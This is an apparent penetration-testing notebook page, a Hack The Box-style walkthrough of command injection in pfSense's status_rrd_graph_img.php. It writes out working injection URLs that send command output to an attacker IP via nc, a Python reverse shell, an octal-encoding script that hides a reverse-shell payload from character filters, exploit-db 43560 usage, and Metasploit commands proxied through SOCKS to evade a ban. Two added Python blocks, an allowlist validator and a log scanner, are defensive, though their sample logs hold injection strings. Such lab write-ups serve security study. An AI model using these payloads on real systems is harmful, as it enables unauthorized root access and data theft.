# pfSense

## Exec Code Exploit

* **google**: pfsense cve
  * cvedetails.com
    * bright red ones for 'pfsense'
    * 'exec code' as indicator
  * Use: CVE-2014-4688 (only 6.5 score)
  * exploitdb: 43560 ..interesting
* **google**: pfsense 2.1.3 changelog
  * Found: Nov 11, 2014 New Features
* **google**: pfsense exploits ..find good blogpost
  * proteansec - pt4: directory traversal
  * proteansec - pt2: command injection
  * **status\_rrd\_graph\_img.php** ..still unpatched, we will use
* REF: [ReverseShell](/03-getting-in/03-reverseshell-php.md#python), [LFI](/04-webapps/lfi.md), [CharEvasion](/03-getting-in/char-evasion-tricks.md)

## Mixed Results

* Had trouble following these examples from ippsec

```
pfsense > status > RRD Graphs

Clean up the link:
https://$IP/status_rrd_graph_img.php?database=system-processor.rrd
https://$IP/status_rrd_graph_img.php?database=queues               ..from exploit/blog
https://$IP/status_rrd_graph_img.php?database=queues;sleep+10      ..worked!
https://$IP/status_rrd_graph_img.php?database=queues;echo+ippsec   ..ugly results
https://$IP/status_rrd_graph_img.php?database=queues;echo+ippsec|nc+10.10.14.6+9000
.. queues;echo+whoami|nc+10.10.14.6+9000    .. root
.. queues;echo+hostname|nc+10.10.14.6+9000  .. pfSense
nc -nvlp 9001

------------------------------
More:
.. queues;echo+abc|nc+10.10.14.6+9000    ..works
.. queues;find+/|nc+10.10.14.6+9000      ..fail ...find data in slash
.. queues;find+.|nc+10.10.14.6+9000      ..ok
nc -lvnp 9001 > filesystem.txt           ..catch

.. queues;echo+abc|nc+10.10.14.6+9000    ..ok
.. queues;echo+abc/|nc+10.10.14.6+9000   ..fails (slash blocked)
.. queues;env|nc+10.10.14.6+9000    ..get environment HOME=/

.. queues;echo+$(HOME)|nc+10.10.14.6+9000    ..get environment HOME=/
.. queues;FIND+$(HOME)|nc+10.10.14.6+9000    ..FIND /  ..NOW WORKS
.. queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt|nc+10.10.14.6+9001

nc -lvnp 9001 > filesystem.txt      
grep root.txt filesystem.txt

------------------------------
reverse
Python Reverse Shell

vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!
```
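The slash filter the notes above keep running into is a character denylist, and the `$(HOME)` trick is exactly why that class of filter fails: it blocks one character while leaving `;`, `|` and substitution syntax untouched. As an added example (not pfSense's own code or patch), the Python below contrasts such a denylist with an allowlist check that accepts only a known RRD database name and then builds the graphing command as an argv list with no shell in between. `KNOWN_DATABASES`, the `rrdtool` arguments and the `/var/db/rrd` directory are illustrative assumptions, not the real page's internals.

```python
import re
from urllib.parse import unquote_plus

# Constructed set of RRD databases the graph page is allowed to render (assumption).
KNOWN_DATABASES = {"system-processor.rrd", "system-memory.rrd", "queues", "queuedrops"}

# One token of letters, digits, '_', '-' and '.'; no separators, quotes or whitespace.
RRD_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def denylist_filter(database):
    """Character denylist in the spirit of the slash filter seen in the notes.
    Included only to show that it waves shell metacharacters straight through."""
    return "/" not in database


def allowlist_filter(database):
    """Accept the value only if it looks like a file name AND names a known database."""
    return bool(RRD_NAME.match(database)) and database in KNOWN_DATABASES


def build_graph_argv(database, rrd_dir="/var/db/rrd"):
    """Return the argv list for the graphing tool, to be run via subprocess without a shell.
    Tool name, DEF syntax and rrd_dir are illustrative, not pfSense's actual invocation."""
    if not allowlist_filter(database):
        raise ValueError("rejected database value: %r" % database)
    return ["rrdtool", "graph", "-", "DEF:ds0=%s/%s:data:AVERAGE" % (rrd_dir, database)]


def check_request(query_string):
    """Decode the raw query string by hand (so ';' in a value is never a separator)
    and report (accepted, decoded_value) for the 'database' parameter."""
    database = None
    for part in query_string.split("&"):
        name, _, value = part.partition("=")
        if unquote_plus(name) == "database":
            database = unquote_plus(value)
    if database is None:
        return False, None
    return allowlist_filter(database), database


if __name__ == "__main__":
    for q in ["database=system-processor.rrd", "database=queues;sleep+10"]:
        accepted, decoded = check_request(q)
        print("%-40s denylist=%s allowlist=%s" % (decoded, denylist_filter(decoded), accepted))
```

The point of the pairing is that `queues;sleep 10` passes `denylist_filter` but not `allowlist_filter`; once the value is constrained to a known name, the argv list built by `build_graph_argv` never reaches a shell, so there is nothing left to inject into.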

## gobuster - 45 minutes

```
> gobuster dir -w medium.txt -u https://10.x.x.x -k -x php,txt,conf,bak
/system-users.txt  ..found username!!!
```

## More Injections

```
https://10.x.x.x/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;id%3Ecmd.txt
https://10.x.x.x/cmd.txt  ..view results

https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20
```

## Octal Code to Injection

* If Dashes and Slashes are Blocked
* Use Octal Encoding

```
#!/usr/bin/env python3
# Encode each character of the command as a printf-style octal escape (\NNN),
# so the string handed to the parameter contains none of the blocked characters.
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
    # oct() returns e.g. '0o160'; drop the '0o' prefix and keep the digits
    payload += "\\" + oct(ord(char))[2:]
print(payload)
```

```
---------------------
Result:
\160\171\164\150\...

Verify:
printf '\160\171\164\150\...'
python -c 'import socket... worked!

---------------------
Octal Injection!
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh
```
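From the defender's side, the octal trick above is what a log-review rule has to undo: the shell metacharacters and the `\NNN` escapes are still present in the request line, they are just not readable at a glance. The following Python is an added example (not from this page, from ippsec or from any pfSense code) that scans constructed access-log lines for requests to `status_rrd_graph_img.php`, flags query values that contain command separators, pipes, substitution syntax or octal escapes, and decodes the escapes so the analyst sees the underlying command. The log format, the `SAMPLE_LOG` lines and the function names `scan_log`, `analyze_line` and `decode_octal_escapes` are assumptions for the demonstration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined-log style) for the demonstration; not real traffic.
# Line 3 carries the octal-escaped form: printf '\151\144' expands to the command "id".
SAMPLE_LOG = r"""
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /status_rrd_graph_img.php?database=system-processor.rrd HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /status_rrd_graph_img.php?database=queues;sleep+10 HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+%27\151\144%27|sh HTTP/1.1" 200 5120
""".strip()

TARGET_PATH = "/status_rrd_graph_img.php"          # the page this rule is scoped to
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
OCTAL_ESCAPE = re.compile(r"\\([0-7]{1,3})")        # printf-style \NNN
# Command separators, pipes, substitution syntax, or an octal escape in a parameter value.
SHELL_META = re.compile(r"[;|&`]|\$\(|\$\{|\\[0-7]{1,3}")


def decode_octal_escapes(value):
    """Replace each \\NNN escape with the character it encodes (what printf would emit)."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), value)


def parse_query(query):
    """Split a raw query string into (name, value) pairs, percent- and plus-decoded.
    Done by hand so a ';' inside a value is never treated as a pair separator."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyze_line(line):
    """Return a list of findings for one log line (empty if nothing suspicious)."""
    m = REQUEST_LINE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path != TARGET_PATH:
        return []
    findings = []
    for name, value in parse_query(url.query):
        if SHELL_META.search(value):
            findings.append({"param": name, "raw": value, "decoded": decode_octal_escapes(value)})
    return findings


def scan_log(text):
    """Run analyze_line over every line and tag each finding with its line number."""
    results = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for finding in analyze_line(line):
            finding["line"] = lineno
            results.append(finding)
    return results


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %d param=%s decoded=%r" % (f["line"], f["param"], f["decoded"]))
```

The decoding step matters more than the metacharacter match: a rule that only looks for `;` or `|` would still fire on line 3, but the analyst would be staring at `\151\144` and guessing; after `decode_octal_escapes` the finding reads `printf 'id'|sh` and can be triaged immediately.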

## Easy Exploit

* <https://medium.com/@barpoet/hackthebox-sense-walkthrough-650865ed538c>
* <https://www.exploit-db.com/exploits/43560>

```
searchsploit -m php/webapps/43560.py
exploit-db 43560 > python command injection script
python3 43560.py --rhost 10.x.x.x --lhost 10.x.x.x --lport 4444 --username rohit --password pfsense
nc -nvlp 4444
whoami ..root
```

## Metasploit

* Plus Socks pivot from another box (since we were banned)

```
service postgresql start 
msfconsole
search pfsense 
graph injection
locate pfsense_graph

use exploit/unix/http/pfsense_graph_injection_exec
set RHOST $IP
set USERNAME rohit
set PASSWORD pfsense
set LHOST tun0
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true
exploit
m> shell
m> hostname
```

## Advanced

* [BruteCSRFPython](/05-passwords-ciphers/hydra.md#brute-csrf-python)

